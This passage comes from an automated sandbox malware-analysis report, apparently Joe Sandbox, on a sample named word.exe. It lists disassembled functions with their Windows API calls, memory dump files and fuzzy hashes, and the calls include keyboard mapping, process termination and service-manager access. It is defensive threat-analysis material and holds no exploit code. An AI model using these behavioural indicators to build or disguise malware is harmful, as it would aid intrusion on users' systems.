                                                                            • EndPath.GDI32(?), ref: 0044724E
                                                                            • StrokePath.GDI32(?), ref: 0044725C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                            • String ID:
                                                                            • API String ID: 372113273-0
                                                                            • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                            • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                            • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                            • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                            Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                            • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                            • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                            • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                            Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0044CBEF
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                            • MulDiv.KERNEL32 ref: 0044CC29
                                                                            • MulDiv.KERNEL32 ref: 0044CC37
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                            • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                            • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                            • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                            Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                            • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                              • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000), ref: 004356D9
                                                                            • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                            • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                            • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                            • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                            • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                            Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32 ref: 00437127
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                            • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                            • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                            • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                            Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\AppData\Roaming\word.exe,00000004), ref: 00436055
                                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                            • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                            • GetLastError.KERNEL32 ref: 00436081
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                            • String ID:
                                                                            • API String ID: 1690418490-0
                                                                            • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                            • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                            • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                            • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                            Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                            • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                            • CoUninitialize.OLE32 ref: 00475D71
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                            • String ID: .lnk$HH
                                                                            • API String ID: 886957087-3121654589
                                                                            • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                            • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                            • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                            • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                            Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                            • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                            • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                            • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                            Function 00441CB4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                            • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                            • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                            • MessageBeep.USER32(00000000,?,?,?,?,?,?,?), ref: 00441DF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID: X+
                                                                            • API String ID: 1352109105-1938338529
                                                                            • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                            • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                            • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                            • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                            Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 763830540-1403004172
                                                                            • Opcode ID: 5d0a2c71db6aade5b96b23b3bd4061acea82ce6bbdfd8ce7b1b84c9309f98e76
                                                                            • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                            • Opcode Fuzzy Hash: 5d0a2c71db6aade5b96b23b3bd4061acea82ce6bbdfd8ce7b1b84c9309f98e76
                                                                            • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                            Function 0045058D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 004505BF
                                                                            • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                            • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                            • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Proc$Parent
                                                                            • String ID: X+
                                                                            • API String ID: 2351499541-1938338529
                                                                            • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                            • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                            • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                            • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                            Function 00450C09 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyWindow
                                                                            • String ID: X+$msctls_updown32
                                                                            • API String ID: 3375834691-654392625
                                                                            • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                            • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                            • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                            • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                            Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,756F13E0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32 ref: 004356C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                            • String ID: nul
                                                                            • API String ID: 2124370227-2873401336
                                                                            • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                            • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                            • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                            • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                            Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,756F13E0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32 ref: 004356C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                            • String ID: nul
                                                                            • API String ID: 2124370227-2873401336
                                                                            • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                            • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                            • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                            • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                            Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                            • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                            • DestroyWindow.USER32 ref: 0044135B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 3529120543-1011021900
                                                                            • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                            • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                            • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                            • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                            Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                            • TranslateMessage.USER32(?), ref: 0044308B
                                                                            • DispatchMessageW.USER32(?), ref: 00443096
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
